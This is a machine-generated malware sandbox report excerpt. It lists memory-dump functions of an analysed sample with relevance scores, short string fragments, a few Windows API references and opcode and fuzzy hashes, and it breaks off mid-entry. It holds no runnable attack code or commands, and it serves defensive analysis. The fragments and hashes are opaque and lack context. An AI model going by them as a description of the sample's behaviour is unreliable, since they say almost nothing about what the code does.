Opcode ID: ac6c0a5e3fa11d85f7cda49ad601e8b9c940f63fb4d1904e4d190d622d98a5df
Instruction ID: 1a3a47903ec7bb6ae5c32ed1dd8d56b0df126c24dd551861ea647a2698c30fea
Opcode Fuzzy Hash: ac6c0a5e3fa11d85f7cda49ad601e8b9c940f63fb4d1904e4d190d622d98a5df
Instruction Fuzzy Hash: 052169B28002598FCB04DF99E44A7EEFBF4FB48324F14855AE415B7280DB746544CFA5

Function 057A5320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 057A53A3

Strings

+/j, xrefs: 057A533F
4'^q, xrefs: 057A535C

Memory Dump Source

Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_57a0000_476D.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: +/j$4'^q
API String ID: 2492992576-130608744
Opcode ID: 479a167ee6087385725e71e272cdd9ca32d6b68384f4880d98dceac6e13e4539
Instruction ID: 54260cee2b927ca8800e43377121cbfb3a4a85d5216406b8c09f26a7851bbf92
Opcode Fuzzy Hash: 479a167ee6087385725e71e272cdd9ca32d6b68384f4880d98dceac6e13e4539
Instruction Fuzzy Hash: B32137B19042598FCB04DF99E4496EEBBF8BB48324F10855AE419B7280DB746944CFA5

Function 00C660FC Relevance: 5.2, Strings: 4, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+/j, xrefs: 00C66147
\Vnl, xrefs: 00C66177
+/j, xrefs: 00C66127
\Vnl, xrefs: 00C662CA

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: +/j$+/j$\Vnl$\Vnl
API String ID: 0-98801035
Opcode ID: 8acffc278628de3576883bd0f0b2a599b3c6a93d13a78fc074c7d8c65f66cc9e
Instruction ID: 63dd8a32c280297dc1e9902efb027fa45bb2aa94dbb6ab39d62b3ac709b7f8bd
Opcode Fuzzy Hash: 8acffc278628de3576883bd0f0b2a599b3c6a93d13a78fc074c7d8c65f66cc9e
Instruction Fuzzy Hash: 2E715CB0E00209DFDF20DFA9C89579EBBF2BF88314F148129E415A7264DB749946CF91

Function 00C66108 Relevance: 5.2, Strings: 4, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+/j, xrefs: 00C66147
\Vnl, xrefs: 00C66177
+/j, xrefs: 00C66127
\Vnl, xrefs: 00C662CA

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: +/j$+/j$\Vnl$\Vnl
API String ID: 0-98801035
Opcode ID: f343054f6925f48ce5c417a812f3db91f8ff637d3c13c06390463ce9d9ef5b1f
Instruction ID: 82c0754cc9eec576ca739f3b4aab7b8c2d2d642988b9b9ca0bdc92ff44af1ec8
Opcode Fuzzy Hash: f343054f6925f48ce5c417a812f3db91f8ff637d3c13c06390463ce9d9ef5b1f
Instruction Fuzzy Hash: 0E714BB0E00209DFDF24DFA9D89179EBBF2BF88314F148129E415A7354EB749946CB91

Function 00C65AB4 Relevance: 4.0, Strings: 3, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+/j, xrefs: 00C65AFF
\Vnl, xrefs: 00C65D77
+/j, xrefs: 00C65ADF

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: +/j$+/j$\Vnl
API String ID: 0-3644837717
Opcode ID: 3eaea93cd69df9024e675b38b2d697c3dc0b3e1393f987e9f9606251aa6fbb39
Instruction ID: 0d0fa97f306af6e7bed1b3efbbdd5f4296509e98fcad8955b6a0328d6874ce22
Opcode Fuzzy Hash: 3eaea93cd69df9024e675b38b2d697c3dc0b3e1393f987e9f9606251aa6fbb39
Instruction Fuzzy Hash: 20B14D70E006099FDF20CFA9D9C579DBBF1BF88314F248129D869A7294EB749946CF81

Function 00C61750 Relevance: 3.9, Strings: 3, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 00C61785
d7p, xrefs: 00C6179D
(bq, xrefs: 00C61A2A

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: (bq$Te^q$d7p
API String ID: 0-1699803613
Opcode ID: de7ddf60d2618a8ce8dce6041d1eb66720cdd3f37fa13202e0aac8ed3fc14587
Instruction ID: 847161ffcc40844b03ca653f5b1df69c34116fa609e4016a641ef72f58b2ca01
Opcode Fuzzy Hash: de7ddf60d2618a8ce8dce6041d1eb66720cdd3f37fa13202e0aac8ed3fc14587
Instruction Fuzzy Hash: 10516B34B101148FD754DF69C498A5EBBF6FF89700F2981AAE806DB3A2CA74DD01CB91

Function 00E533E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendARP.IPHLPAPI(?,?,00000000,?), ref: 00E53472

Strings

+/j, xrefs: 00E5340A

Memory Dump Source

Source File: 00000009.00000002.2857955672.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e50000_476D.jbxd

Similarity

API ID: Send
String ID: +/j
API String ID: 121738739-589978739
Opcode ID: 104e9083365696eb0f03b0de923a8638ce3665b8d4599f9944f939370250be1a
Instruction ID: 006d7decd34a990dcbaa8743797b0acc0b1bcceba3aa0100c99413efc98236c6
Opcode Fuzzy Hash: 104e9083365696eb0f03b0de923a8638ce3665b8d4599f9944f939370250be1a
Instruction Fuzzy Hash: 6121E4B59002189FCB10DF9AD885BDEFBF4FB48314F10842AE859A7350D374A944CFA5

Function 00E533E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendARP.IPHLPAPI(?,?,00000000,?), ref: 00E53472

Strings

+/j, xrefs: 00E5340A

Memory Dump Source

Source File: 00000009.00000002.2857955672.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e50000_476D.jbxd

Similarity

API ID: Send
String ID: +/j
API String ID: 121738739-589978739
Opcode ID: d2ac2684cc7c28b4559d306fbc1807fa21001908b887abb3c039034c1193c18b
Instruction ID: f7ccee262ff946e8c9064ac1e48d5eaeb8c4988b418e6dc98a12434fbd7dc15a
Opcode Fuzzy Hash: d2ac2684cc7c28b4559d306fbc1807fa21001908b887abb3c039034c1193c18b
Instruction Fuzzy Hash: 8921F3B19002089FCB10DFAAD885BDEFBF4FB48310F10842AE859A7350D374AA44CFA4

Function 00C66385 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+/j, xrefs: 00C663AF
+/j, xrefs: 00C663CF

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: +/j$+/j
API String ID: 0-2873887342
Opcode ID: fea8ffee835a0dce0d8a33f809fe0c4979fa502dcbba652505cdecce74909c84
Instruction ID: fe37dca736cbf222427005f2078983e940ee7b722d8098e7f707df8f2c6af8e2
Opcode Fuzzy Hash: fea8ffee835a0dce0d8a33f809fe0c4979fa502dcbba652505cdecce74909c84
Instruction Fuzzy Hash: E9A14C70E00209CFDF20CFA9D9867ADBBF1AF88314F248129E855A7294EB74D945CF91

Function 00C66DA0 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

(bq, xrefs: 00C66F20
(bq, xrefs: 00C66EF4

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 3929c042433b350cc7b371c4fba756222c1097add3eb52a33cbcaabb4abb4687
Instruction ID: b0d626c3f45926ae0db95a44f634451ce900cb2f5dac51976a0ba67140d5c863
Opcode Fuzzy Hash: 3929c042433b350cc7b371c4fba756222c1097add3eb52a33cbcaabb4abb4687
Instruction Fuzzy Hash: 2171B0317042404FCB19DF69D89091EBBE6EFC5354714C5BAE809CB3AADE31ED468791

Function 00C67020 Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00C67051
dLdq, xrefs: 00C6709B

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: Te^q$dLdq
API String ID: 0-1027511480
Opcode ID: 846d00ac7bf5bc4efebfb1540ed608ed983499de6328a8a9a3469803cf2d3fdc
Instruction ID: 03e083cb6d3578e7b0a31784b4cab4003499a51ed8914f923d1b9f22228d170f
Opcode Fuzzy Hash: 846d00ac7bf5bc4efebfb1540ed608ed983499de6328a8a9a3469803cf2d3fdc
Instruction Fuzzy Hash: 5251F275B101149FDB44EF69C898A5DBBF6FF89B14B2580AAE406DB3B1CB71EC418B40

Function 00C615B8 Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

dLdq, xrefs: 00C615F3
Hbq, xrefs: 00C616D8

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: Hbq$dLdq
API String ID: 0-411705877
Opcode ID: d7048bbf7a19a9baba1d058a0442e00531b316e1caf9a07a166f5ec38931d13c
Instruction ID: febec3c235d738fb0dcfe2e96f8f581ec1784d7c4e5a710f803f892daf4daf0a
Opcode Fuzzy Hash: d7048bbf7a19a9baba1d058a0442e00531b316e1caf9a07a166f5ec38931d13c
Instruction Fuzzy Hash: 1B41B435B042448FCB15DF69C498B9EBBF6EF89304F1885AAE406DB3A2CA74DD05CB51

Function 00C68970 Relevance: 1.9, Strings: 1, Instructions: 667COMMON

Download Yara Rule

Strings

fcq, xrefs: 00C68A53

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: fcq
API String ID: 0-2768158334
Opcode ID: 1f0d8536a111be2d405db4d7e74f11af59eefedfaf3c8cad767335908c9f54f5
Instruction ID: 8b63e7ab3d2d16e80e3625c9d0fe00ccc7ee5c061fcbdcf562d35f8e28025fdd
Opcode Fuzzy Hash: 1f0d8536a111be2d405db4d7e74f11af59eefedfaf3c8cad767335908c9f54f5
Instruction Fuzzy Hash: 56522034A04309DFDB06ABA4D554BAEBB77FB88304F108814E845377ADCB36A895DF25

Function 00C6CB98 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

d, xrefs: 00C6CD78

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: acb7776deaa3a078bac08413ef12230238334b6d361320ff5144b884c2318a50
Instruction ID: abb37434147b9e489c32542c0727a37a830fe1fc3772f01966ba1d42189015dc
Opcode Fuzzy Hash: acb7776deaa3a078bac08413ef12230238334b6d361320ff5144b884c2318a50
Instruction Fuzzy Hash: 4A321770A00609DFCB24CF69D9C4A6DFBB2FF88304F248629E4669B655D730ED95CB84

Function 057A0B11 Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 057A0B6C

Memory Dump Source

Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_57a0000_476D.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31100409f3725eed70af3b89501ae84f910d0e5ec75dc2b9b2c4e6e1c05a32cc
Instruction ID: 218ed9800e4aa8d5aaa8d7e1c4a1e6d4a92933d42a07110af3a7a3e8bdb29de4
Opcode Fuzzy Hash: 31100409f3725eed70af3b89501ae84f910d0e5ec75dc2b9b2c4e6e1c05a32cc
Instruction Fuzzy Hash: 5B215E31704215CFC715EB64C9987AE77F2ABCD348F204979D406AB3A6DB758C42DB81

Function 057A0B20 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 057A0B6C

Memory Dump Source

Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_57a0000_476D.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62aef5a17959334eb522fd50893d539c8dcd5028cf210b4a302892e064f515d4
Instruction ID: 5e898e25164144836df91ed326c95ad1595d049bcdbdb323ec53a32a2bb2d287
Opcode Fuzzy Hash: 62aef5a17959334eb522fd50893d539c8dcd5028cf210b4a302892e064f515d4
Instruction Fuzzy Hash: 0E215C31704214CFCB58EB68C9987AE33F6ABCD349F204569D406AB3A6DF719C42DB81

Function 057A0A6A Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 057A0A89

Memory Dump Source

Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_57a0000_476D.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e7206a7a947bd9db37f67daf1e08b37e7d68c649296ea0d16f8f48bedbb402bd
Instruction ID: 36c715bc89cd4f5479c1de74eeb9d097418b3a8b91a86c15cd47eeca3d8760d8
Opcode Fuzzy Hash: e7206a7a947bd9db37f67daf1e08b37e7d68c649296ea0d16f8f48bedbb402bd
Instruction Fuzzy Hash: 90E03937901424DFCB15EB94E9587ECB331FBC4311F018621D01253518CB306C92CBC1

Function 057A0A7C Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 057A0A89

Memory Dump Source

Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_57a0000_476D.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a4a15b2e28d94ff6b38c027e315b2895eabbe7f784da954e9f1a24592944671a
Instruction ID: ac96b40be4f7f20fbffa533a6dc62a4005e58f7e46decc1a8929903443dad483
Opcode Fuzzy Hash: a4a15b2e28d94ff6b38c027e315b2895eabbe7f784da954e9f1a24592944671a
Instruction Fuzzy Hash: 13E09236901924EBCB19DB84E9987ECB371FBC5312F01C625D55693558C730ACA2DF84

Function 00C6860D Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

K, xrefs: 00C687A7

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 8fb03eb39000948cd9fb5482a732ef2ff2e42a11b7a9fe2f082d02c89095ba0d
Instruction ID: 73eb0efaa377a12e1862a915f7970da44f9a68616f5a79662a5ca84230b39e1a
Opcode Fuzzy Hash: 8fb03eb39000948cd9fb5482a732ef2ff2e42a11b7a9fe2f082d02c89095ba0d
Instruction Fuzzy Hash: 5A51F631A047068FCB25DF68C5905AEBBF2FF85308B248669D456AB395DF30ED4ACB41

Function 00C68651 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

K, xrefs: 00C687A7

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 22ab9fd8028dfa9edbbf0488d1c991cd3392eaf64d5dc21706ebd7aae4ab1d21
Instruction ID: 5c416db20669c46e86cbb13e51974b0ee2f54c011dcfd52f18870a5d793d9848
Opcode Fuzzy Hash: 22ab9fd8028dfa9edbbf0488d1c991cd3392eaf64d5dc21706ebd7aae4ab1d21
Instruction Fuzzy Hash: 4D418271E006099FDB25DFA9C59059EBBF2BF84308F208629D416AB355DF70ED4ACB81

Function 00C685FD Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

K, xrefs: 00C687A7

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: 6675a6576b11017815fe2958154c51bc0538c13598a790b4a7b4db204bf0307d
Instruction ID: aea2fb2a42a80114e538f23c78dd5d66122ada410731c1018371939a430477a9
Opcode Fuzzy Hash: 6675a6576b11017815fe2958154c51bc0538c13598a790b4a7b4db204bf0307d
Instruction Fuzzy Hash: A141A271E046458FCB25DFA9C5905AEBBF2BF84308F248629D415AB395DF30ED4ACB41

Function 00C61BD0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00C61C23

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: ef66aebb50f4d114d1190012feb5e4a8474e77851ab5883c578f8478c59909eb
Instruction ID: d256e8f69b4195d2d2efa726fdeb4047c409457d5851ed9ab8800087539b4230
Opcode Fuzzy Hash: ef66aebb50f4d114d1190012feb5e4a8474e77851ab5883c578f8478c59909eb
Instruction Fuzzy Hash: 7431E230F002169FDB54EBB98480A6EBBF6FFC9714B184169D55ADB3A4EE308D42C791

Function 00C63BCD Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

+/j, xrefs: 00C63C00

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: +/j
API String ID: 0-589978739
Opcode ID: 9dd200bd9785af9edaa20ecf3462323f43e03e39651401b6f6b06c9fdb1538cd
Instruction ID: 4dd56e9c43995f00e5c3696d50fa0be64ceb2c06c3925a713dfe667af5b7ee1c
Opcode Fuzzy Hash: 9dd200bd9785af9edaa20ecf3462323f43e03e39651401b6f6b06c9fdb1538cd
Instruction Fuzzy Hash: FC41F0B0D003499FDB20DF99C484ADEBFB5FF48310F208129E81AAB264DB759A45CB90

Function 00C63BD8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

+/j, xrefs: 00C63C00

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: +/j
API String ID: 0-589978739
Opcode ID: 53212337ae3ff8d33ab70355ece8cc9f4486e1ed539eeea4fd11ed713e7350a8
Instruction ID: 4f2170cc86c8297b8dcca185e2b9f876af77d0084005b942ac0ff23380ba952e
Opcode Fuzzy Hash: 53212337ae3ff8d33ab70355ece8cc9f4486e1ed539eeea4fd11ed713e7350a8
Instruction Fuzzy Hash: 8B41E1B0D0034D9FDB10DF99C584ADEBFB5FF48314F208429E81AAB254DB75AA45CB90

Function 00C615A8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

dLdq, xrefs: 00C615F3

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: dLdq
API String ID: 0-3390252261
Opcode ID: 0fea252ca975e1e260ebe142a444c6e7fcff2c845337bfcfe9d46304b48a7a4a
Instruction ID: 54aa498b0a8629477ed139358bc74a79a2d64d7b563629f7f8e66874edf7cf51
Opcode Fuzzy Hash: 0fea252ca975e1e260ebe142a444c6e7fcff2c845337bfcfe9d46304b48a7a4a
Instruction Fuzzy Hash: EB31AF74A002048FDB15DF69C588BADBBF2FF88300F188569E402AB3A1CB70DD45CB91

Function 00C6CA08 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

&?c, xrefs: 00C6CA36

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: &?c
API String ID: 0-1340406174
Opcode ID: 35b9b20dd2811ed3405fc9f702858174fe6a1a197379419148c61c95649feeef
Instruction ID: 0533b398b5e70eeb15eab092b89ad965afb7fe100d1746976a0bb68a479c81c4
Opcode Fuzzy Hash: 35b9b20dd2811ed3405fc9f702858174fe6a1a197379419148c61c95649feeef
Instruction Fuzzy Hash: BC11A170A003009FEB089F59D98475ABBA5FF84311F108579E5489F3DADBB59C04C7A0

Function 00C6CA18 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

&?c, xrefs: 00C6CA36

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: &?c
API String ID: 0-1340406174
Opcode ID: e7193234854746c6af981173c7bf605d302fad2d133d68af49eb8d2b86e2265d
Instruction ID: b7db427a08ff2fdf7dd2d062665b3e0a1008240214246c90af5634146b118724
Opcode Fuzzy Hash: e7193234854746c6af981173c7bf605d302fad2d133d68af49eb8d2b86e2265d
Instruction Fuzzy Hash: 2901B570A003009FDB089F55D98475ABBA6FFC8301F108439E5089F39ADBB59C04C7A0

Function 00C616D7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00C616D8

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 78d9b5ce295bcfbc0c0cf6c9e415ef18a2597d19602ca8b6ba80891498aa2b9c
Instruction ID: cb67189a7a8e49ebcbbc3c8e63980d97ba140450cfb87b9d08f1d4f7988c105e
Opcode Fuzzy Hash: 78d9b5ce295bcfbc0c0cf6c9e415ef18a2597d19602ca8b6ba80891498aa2b9c
Instruction Fuzzy Hash: 2CF0C82570D2901FC746573D586556E2FE6AFD729032944FAD149CB3A3DD288C07D352

Function 00C61F3F Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da665a1c14e9e46e45cda1b5c1733909adb998b9ee67feb3fd855be848a2d813
Instruction ID: a260e7c24c44f5a080e04b83db9c27a7276f9228f535f86e77bab8deec57a33d
Opcode Fuzzy Hash: da665a1c14e9e46e45cda1b5c1733909adb998b9ee67feb3fd855be848a2d813
Instruction Fuzzy Hash: B5720E709002188FDB98DBA4CD947DE7BB6FF89300F1081A9D14AA73A5DE345E89EF51

Function 00C61F50 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa93b5ef3f693fade1348534b7dcf3cb72a2de6e3e59c960994af1dcb19393e7
Instruction ID: f8518398a705626464ad87b7d1d58b1a6f917dd784435a8c70bc37446936a5a7
Opcode Fuzzy Hash: fa93b5ef3f693fade1348534b7dcf3cb72a2de6e3e59c960994af1dcb19393e7
Instruction Fuzzy Hash: FE720F709002188FDB98DBA4CD947DE7BB6FF89300F1081A9D14AA73A5DE345E89EF51

Function 00C6AB38 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4414ca376f1b6bc942695a22897515b8d123e2cdcbde8f61cb5c6e5b506b03c
Instruction ID: bdc5cc7518d2217fd0ba1a177153d35697e63d1d40d7b57024f40b8f5b3c6966
Opcode Fuzzy Hash: b4414ca376f1b6bc942695a22897515b8d123e2cdcbde8f61cb5c6e5b506b03c
Instruction Fuzzy Hash: 53810534B092559FCB01EF74D5A45AE7BB2EFC9309B148156C405EB3AADB388C42CF96

Function 00C6D598 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e3e2517708bf92a4ef1165bb93c17380b26c881dcea2dfb82a940e11d09b3b
Instruction ID: ccdc156c276321707a6034528d4a87c3cb6e061805597bf36f9be56e84d89f8e
Opcode Fuzzy Hash: 83e3e2517708bf92a4ef1165bb93c17380b26c881dcea2dfb82a940e11d09b3b
Instruction Fuzzy Hash: A861AF70B002159FD714DF78C480A6EBBF6AF88314F24C169D45AAB396DB32EC42CB95

Function 00C67E29 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e237808f90b520bdef04989a8a410d8551165d4f188ed5c7a6e99b4b5abcb0
Instruction ID: 0de61d749e588c48119e1ca43c6562a89600a5a522b00f40ec9a28a42af3c1d3
Opcode Fuzzy Hash: 06e237808f90b520bdef04989a8a410d8551165d4f188ed5c7a6e99b4b5abcb0
Instruction Fuzzy Hash: 6A611C34B0820ACFCB48EBB0E8A866F7772BB847497608916D4169B3D8DF345C42CF81

Function 00C67E38 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c60000_476D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153aae2d7ffddbfff4c50db8f7b4bf5e0b2b90e4c32c9fafffcb072428ed6f4e
